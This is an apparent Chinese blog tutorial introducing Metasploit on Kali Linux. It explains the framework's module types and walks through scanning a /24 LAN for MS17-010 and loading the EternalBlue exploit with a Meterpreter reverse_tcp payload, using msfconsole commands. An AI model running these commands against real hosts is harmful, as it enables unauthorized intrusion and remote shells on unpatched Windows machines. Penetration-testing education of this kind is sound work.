茴香豆安全 - KALI学习笔记

茴香豆安全 - Metasploit入门

2020-06-22  本文已影响0人  wycdavid

一、前言

二、相关工具准备

三、Metasploit 简介

1. 启动 Metasploit

msfconsole
image.png
  • exploits,是渗透攻击模块,利用发现的安全漏洞或配置弱点对远程目标进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问的代码组件。
  • payloads,是攻击载荷模块,用来在目标系统上完成实际的攻击功能的代码,比如反弹式shell、bind shell等。
  • auxiliary,是辅助模块,主要用来执行扫描,嗅探,指纹识别等,算是信息搜集的内容
  • post,是后渗透模块,在取得目标系统远程控制权后,可进行一系列获取敏感信息,跳板攻击等后渗透攻击的动作。
  • encoders,是编码工具模块,确保攻击载荷中不会出现渗透攻击过程中应加以避免出现的“坏字符”,也可以用来进行免杀,防止被杀毒软件,防火墙,ids 等检测
  • nops,空指令模块,空指令是对一些程序运行状态不会造成任何实质影响的空操作或者无关操作指令
  • POC, Proof of Concept ,一般是指可以证明某个漏洞的代码
  • EXP,是 Exploit 的简称。
  • Shellcode,是Payload的一种,可以利用此代码获取shell,包括正向的,反向的,甚至meterpreter。

2. 更新 Metasploit

  • apt-get update,用来更新索引源,也就是同步软件包的索引信息,可以理解为更新系统软件的下载地址。
  • apt-get upgrade,用来升级系统上的软件包。
  • apt-get dist-upgrade 用来升级整个 linux 系统,这个命令同时会升级所有已经安装的软件包。

四、Metasploit 渗透 MS17-010 漏洞实例

1. 搜索模块

search MS17-010
image.png
  • 我们可以看到一些 auxiliary的辅助模块和一些exploit的攻击模块,至于使用哪一个,你可以根据模块的简介来判断,或者不怕麻烦就挨个试下
  • 你用得多了自然就知道哪些是有用的模块,如果熟练了也可以跳过搜索的步骤

2. 扫描局域网中的MS17-010漏洞

 use auxiliary/scanner/smb/smb_ms17_010
image.png

required 列 如果为yes就代表是必填项,不过大多数都已经填上了默认值,我们重点关注下红框中的两个参数

set rhosts 192.168.1.0/24
image.png
  • 这里我设置了 192.168.1.0/24 这个网段 (相当于从192.168.1.1到192.168.1.254 ),这是标准的IP段表示方法,不明白的自己百度
  • 看参数说明应该也支持通过文件的方式加载IP,这里就不实验了
set threads 10
image.png
image.png

3. 加载攻击模块和攻击载荷模块

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
image.png

这里我就不再赘述了,总之,使用模块用use命令,设置参数用set 命令,要设置哪些参数show options查看
rhosts 就是攻击目标的IP
lhost 就是攻击者(你自己)的IP

五、最后

上一篇 下一篇

猜你喜欢

热点阅读